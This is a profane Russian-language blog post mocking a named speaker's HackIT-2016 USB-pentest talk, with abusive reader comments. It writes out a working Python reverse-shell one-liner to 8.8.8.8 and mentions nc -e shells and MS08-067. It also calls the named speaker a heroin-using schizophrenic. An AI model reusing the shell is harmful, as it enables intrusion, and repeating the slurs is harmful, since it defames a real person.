Дорогие ебаные читатели и ебанная Редакция, хочу поделиться своими впечатлениями от посещения конференции HackIT, проходившей недавно в Харькове, цена билета на которую колебалась от 200 до 1500 гривен. Идя на конференцию, где должны были выступать и соревноваться в CTF лучшие из лучших специалистов в Украине по информационной безопасности, меня не покидала мысль что эта конференция — очередная бессмысленная пафосная хуйня и бесполезная трата времени, в чем я и убедился позже.
Для того чтобы прояснить примерный уровень большинства выступающих, мною и опытным врачом-психотерапевтом был проанализирован доклад Алексея Мисника «HackIT-2016. USB устройства для пентеста.» Что из этого получилось читайте далее.
«Стартуем !» — именно этой фразой Алексей начинает свой охуитительный доклад. С первых минут видео можно оценить как превосходное ораторское искусство докладчика так и глубокий стиль изложения материала, восхитительную работу оператора также нельзя оставить без внимания, но вернемся к самому Алексею.
Алексей будучи фанатом сериала «Mr. Robot» взял лучшее от этого персонажа себе, а именно: шизофрению и любовь к тяжелым наркотикам, доказательством этого может служить несвязная речь, непредсказуемая смена настроения, тремор конечностей, при этом Алексей не забыл отбросить малозначительные качества: сообразительность, целеустремленность, выдающиеся навыки.
Со всем вышеперечисленным (наркотиками и шизофренией) Алексей решил выступить на конференции, поскольку речь Алексея может быть не понятна обычному человеку, с помощью психотерапевта давайте разберем бред больного. С полным 44-минутным видео вы можете ознакомится по ссылке внизу материала, а здесь нарезка самого «сока» выступления:
дисклеймер: видео может вызвать укачивание и тошноту, благодаря мастерской работе оператора — стабилизация изображения это для слабаков, давайте лучше пальцами напостой крутить zoom-in/zoom-out
Разбираем перлы:
\-Все думают шо есть вот mass storage, что-то можно с ним сделать — мы его видим, на самом деле вся уязвимость только в контроллере
Алексей бормочет что-то невнятное подменяя общепризнанные значения терминов своими вымыслами. По мнению врача это может быть вызвано продолжительным употреблением героина.
\-Я просто проводил два года аудит в гос. структурах по безопасности — поэтому я все там знаю идеально
Делая отступления от темы доклада Алексей, как бывалый специалист не забывает и повыебываться своими «достижениями».
\-Там MS08 подходил к любому компу просто
Больной впадая в бессознательное состояние продолжает нести несвязный бред, на этот раз причиной приступа служит код «MS08». «Что же такое MS08?» этот вопрос возникает в голове у неподготовленного зрителя, опытный врач подсказывает что скорее всего речь идет об уязвимости MS08\_067 в системах Windows, эксплуатируя которую можно получить полный доступ к уязвимой системе. Приступ заканчивается и Алексей продолжает.
\-Он ничем себя не выдаст, вы просто приходите его снимаете, забираете, считываете то шо вам надо
этой фразой Алексей описал все тонкости работы с аппаратным кейлоггером на основе USB, после этого врач сделал неутешительный вывод: пациент — мамкин кулхацкер, занимающийся суходрочкой и запускающий эксплойты в многострадальный localhost.
\-Я проводил как-то аудит, мы смогли взломать одну из машин сотрудника
Алексей признает раздвоения личности, при лечении шизофрении это очень важно. Алексей помнит что начинал аудит он один «Я проводил как-то аудит», но за тем личность раздваивается «мы смогли взломать одну из машин сотрудника». Врач рекоменует пациенту во избежания обострений не проводить больше аудиты. И вообще уйти нахуй со сцены.
\-Я тоже юзер MacBook, кке, мака
Алексей периодически делает отступления чтобы повыебываться. На этот раз причиной выебонов стал MacBook которым владеет пациент.
\-Я сидел в военном институте мы ломали WI-FI соседнего дома
Как настоящий мамкин хакер Алексей не забывает упомянуть о криминальном прошлом. Проникновение в домашнюю сеть граждан Украины используя программно-технические средства и нарушение 361 статьи криминального кодекса Украины по мнению Алексея — достижение о котором стоит рассказать в своем докладе. Сказочный долбоеб — резюмирует психотерапевт.
\-Да я выпускник военного института просто, поэтому что бы вы знали, если Вам надо то можно брутить с соседнего дома WI-FI
Этой фразой Алексей призывает слушателей нарушать закон Украины «Если надо — то можно». Если надо денег — отожми денег, если надо подарить девушки сережки — сорви их с прохожей старушки. Для завершения образа Алексею не хватает только куполов на спине и золотого зуба.
\-То что залоченная винда или мак выдают NTLM хеш при подключении USB устройства, есть при чем официальная статья как это сделать и мы это сделали!
Невероятно, аплодисменты, сделать что-то шаг за шагом имея инструкцию невообразимо сложно, восхитительно !
«К чему вообще этот доклад ?», «Где оригинальный контент ?», «Что этот уебан тут делает ?» — Именно эти вопросы задает большинство специалистов в области информационной безопасности слушая Алексея.
\-А от Mac OS, в чем сама уязвимость атаки ?
«Уязвимость атаки» — таким беспощадным для сознания здравомыслящего человека оборотом Алексей пытается выбить врача из игры, но врач смахнув пот со лба, продолжает анализировать состояния больного дальше.
\-Ну был там как-то CTF c SQLIte, база данных, cкуля, но ничего более, яж не пишу под мобильные
Что это вообще за нахуй ? Схуяли платить 1500 грн за вход на конференцию где говорят «скуля» вместо SQL-injection ? Все больше вопросов остается без ответа.
\-Ну это так для затравки, вторая часть будет намного круче
Да, да внимательно Вас слушаем, продолжайте. «Пора вызывать санитаров и срочно госпитализировать больного» — шепотом добавляет психотерапевт.
\-Я сделал очень быстро и с первого раза
Алексей прибегает к излюбленной стратегии — отступление для выебонов.
На этом этапе больше половины доклада позади, но в чем смысл доклада и где оригинальный контент не понятно.
\-Заливая вместе с прошивкой получаете уязвимую флешку
Алексей снова бормочет что-то невнятное употребляя половину слов не к месту и скорее всего сам не понимает о чем рассказывает, надеясь на лучшее врач рекомендует увеличить дозы назначенных Алексею препаратов.
\-Он не пройдет на большинстве систем потому что строчка /bin/bash шоб дать shell нам на удаленном компьютере он не всегда входит в стандартный пакет и чтобы он заработал его нужно подключить ситуация меняеться время от времени так шо надо тестировать на разных системах, я тестировал на Ubuntu 14.04 и без подкачки дополнений вот этот -e /bin/bash shell у меня не получился
Ну что же, для того чтобы понять насколько Алексей хороший специалист врач решает разобрать эту реплику полностью. В nc флаг -e нужен для того чтобы перенаправить STDOUT в STDIN программы обозначенной данным флагом, в современных Linux дистрибутивах утилита nc не поддерживает этот флаг. В данном случае Алексей надеться сделать reverse shell и вместо того чтобы добавить в доклад хоть немного оригинального контента он доставляет на машину, которую будет атаковать, пакеты которых в реальной жизни там не будет. Может проще сразу поставить rootkit ? Есть масса других способов сделать reverse shell, например использывать интерпретаторы python и perl которые есть в каждом современном Linux дистрибутиве, например: python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect((«8.8.8.8», 666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\[«/bin/sh»,»-i»\]);’. Не понимая почему Алексей решил заняться информационной безопасностью а не садоводчеством, врач продолжает слушать жалобы больного.
\-Кто знает шо такое reverse shell ? Так ну процентов 30, окей
На этом моменте ситуация окончательно прояснилась, причина по которой Алексея не обоссали во время доклада проста, 70%+ сидящих в аудитории — мечтающие «вайтишники» накопив денег на доставке пиццы и раздаче листовок тут же решили их спустить на курсы от Пивоварова и билет на конференцию от маминых хакеров в надежде чему-то научиться и не повторить судьбу последнего.
\-Я защищен Avast’ом вы все видите, security есть
«…но не в этом здании и не в моем докладе, а где-то, я хочу верить !» — забывает добавить Алексей.
\-Вопрос: кто знает про атаку DNS туннелирование шо это такое ?
Про «атаку DNS туннелирования» не знает даже Иисус, Аллах и Будда вместе взятые. Эта атака существует только в героиновых грезах Алексея. «DNS Tunneling» — это не атака, а метод обхода механизмов защиты основанный на передачи данных используя DNS запросы, применяется в основном для эксфильтрации данных — поясняет врач.
\-Мой доклад окончен, если есть вопросы — задавайте
После доклада Алексея у большинства людей был только один вопрос: «Кто блядь вернет время и деньги потраченные на эту хуйню ?».
Краткое резюме всего доклада: ничего вместо рассказа о поиске и использовании готовых решений, притом зачастую нет понимая как работают эти самые решения нет, и даже вместо того чтобы написать сотню строчек кода для автоматизации процесса подготовки флешки для таргетированной атаки и придать смысл своему докладу, Алексей продолжает радостно рапортовать о его детских экспериментах.
«Тяжелый случай, скорее всего не излечим.» — говорит доктор после знакомства с пациентом. С чем сложно не согласиться. Но когда с Алексеем все стало ясно, появились другие вопросы связанные с организацией и качеством конференций по информационной безопасности в Украине. А это уже совсем другая история…
Ссылки.
1\. Полное видео доклада (44 минуты): https://www.youtube.com/watch?v=72xFaXDXAok
2\. Слайды: http://www.slideshare.net/HackIT-ukraine/usb-66977209
3\. LinkedIn: https://www.linkedin.com/in/oleksii-misnik-08158255
4\. HackIt http://2016.hackit-ukraine.com/rus
второй нах!
докладчик мудак, типовый ит-шник
Дядя, дай макбук.
Зайди ко мне в кабинет немедленно. Ha-ha-ha-ha!
Как же дохуя текста
КР СТ ТЛ (краткость сестра таланта)
И Н со своими сокращениями, кусок дерьма с дислексией.
4:44 Пацанчик в толчок просто хочет, ходит по аудитории, места себе не находит, предлагает устроить перерыв, а его никто не поддержал 🙂
О BuildStuff конференции никто не напишет?
Я напишу. Ходил на BuildStuff. вырванные 2 дня из моей жизни, хорошо хоть что не из своего кармана платил. Новых знаний получил 0!
Согласен. Хоть там было несколько интересных докладов, — не пойду в следующий раз.
Я вот сижу тут такой скромный с зп 800 бачей. И вижу приходят «мидлы c 10 лет опытом» на интревью который на просьбу «Раскажите что такое пост и гет запросы и разницу между ними» отвечают «это глобальные масивы в PHP» и не скромно озвучивая свои ожидания «две тисячи долларов налом», и у меня возникает риторический вопрос. ВЫ ЧЕ БЛЯ ПАЦАНЫ АХУЕЛИ?
Потому что можем и будем.
А ты не завидуй, неудачник.
А че ж ты сам двушку не получаешь? Может потому что сам тупой? Или перед менеджером язык в жопу залазит?
Пиздец.
Как то я пару лет назад то же хотел вкатиться в ITsec, но как то не пошло. А тут реальный фанбой робота рассказывает такое, что даже я, со своим недосамообучением кулхакинга понимаю какая же это чушь. Блять, а ведь думал посетить какую то конфу безопасников. Ебал я нахуй это дерьмо.
да бля, чьо ви доїблись, марнотратщікі хуєві: дакладчік розпереживався і ліпе єрунду всяку підряд. в мене є знакомий такий як він точь-в-точь, навіть виглядом його нагадує. а Льоха з кимось на пиві вєрняк ліпше би говорив, і жаждущім знаній «собутильнікам» було б інтірєсно ілі послухати його ілі обмінятися досвідом. ше раз, карочє гаваря, впізду всі піздоканфєрєнциї і піздодаклади. читайте книги/форуми/блоги
Бляяаааааа… За выслушивание этого еще и деньги хотят ???
Блядь, я даже знаю где именно это говно училось, в ІССЗІ НТУУ КПІ тем более, даже знаю где жило. А жило в говно казарме, страдало пожызненной хуйней, а потому то и пиздило интернет с соседних домов потому что говно нехотело зарабатывать денег, а клянчил их у мамки и хуярил траву в параше пока никто не видит. Мало того что в этом институте кроме ебаного мозгоправства и военщины нехуя толком нету…. от тудого ВСЕ валят как с ЖОПЫ МИРА, ТАК НЕТ, ЭТО это ебаное чмо своим ущербным и уставшым от выебничества мозгом, и пиздой под носом, пиздило «интернет» у жытелей. Могу сказать единственно в защиту далбоеба что в этом ебаном «институте связи» что на печерске (кст.) У МНОГИХ ГОЛОВА БОЛЬНА ОТ БЕСКОНЕЧНОГО ВЫЕБНИЧЕСТВА ЧТО ОНИ СБУшники итд. Так что прописываем больному: смуззи, стартапы и всего этого много-много шоб прорыгался сука просрался подавился всем этим, а потом надеемся что выздоровеет.
—————
Сука просто задело до боли…
\>>ІССЗІ НТУУ КПІ
шо-шо?
А что, коммент выше трушный или ты не согласен?!
Я поддерживаю!!!!!!! +10000
После этого видоса этот гусь получает навес — Масторыч.
Шапки-петушка не хватает
Пизда. Хули еще один дурачек))) таких на конфах дохуя, бо норм человек лучше бабу потянет чем пойдет пиздеть на конфу.
сука ОТДАЙ МОЙ МАКБУК!!! ты все равно блядь пользоваться им не умеешь!
Короче почитал я статью и понял , что в первую очередь — я долбаеб, ибо я нихуя не шарю в этой вашей безопасности, если тут собрались такие кенты которые легко видят поебень в докладе этого опущенца , скажите че такое почитать интересное? Желательно на буржуйском языке (т.е. на англ, а то буржуй эт от слова Буржуа, что в общем-то францэ) .
PS. Даже без знания того о чем тип пиздит его хуевийшая дикция, несобранность и неспособность составлять слова последовательно вызывает сомнения в его квалификации. И вот эта хуйня с «ШО» я сам говорю как хуйло неграмотное но ты ж, блять, на публике, контролируй себя, нахуя этот суржик.
хаха. Поддерживаю
статья — высер, как и 99% на ебаном
твой высер очень важен для нас, спасибо что потратил время и поделился
Речь любого из Ит-шников — высер на 99%. Мне противно слушать почти каждый из докладов на таких конференциях по той причине, что почти каждый докладчик не владеет ни одним из так называемых по-пацански «софт скилов», а на нормальном языке «навыков общения». Сука, хочется взять и уебать каждому, кто в чат пишет на ломаном рунглише, а потом и в каждом разговоре повсеместно вставляет эти buzzwords, базворды. У меня из ушей кровь течёт от такого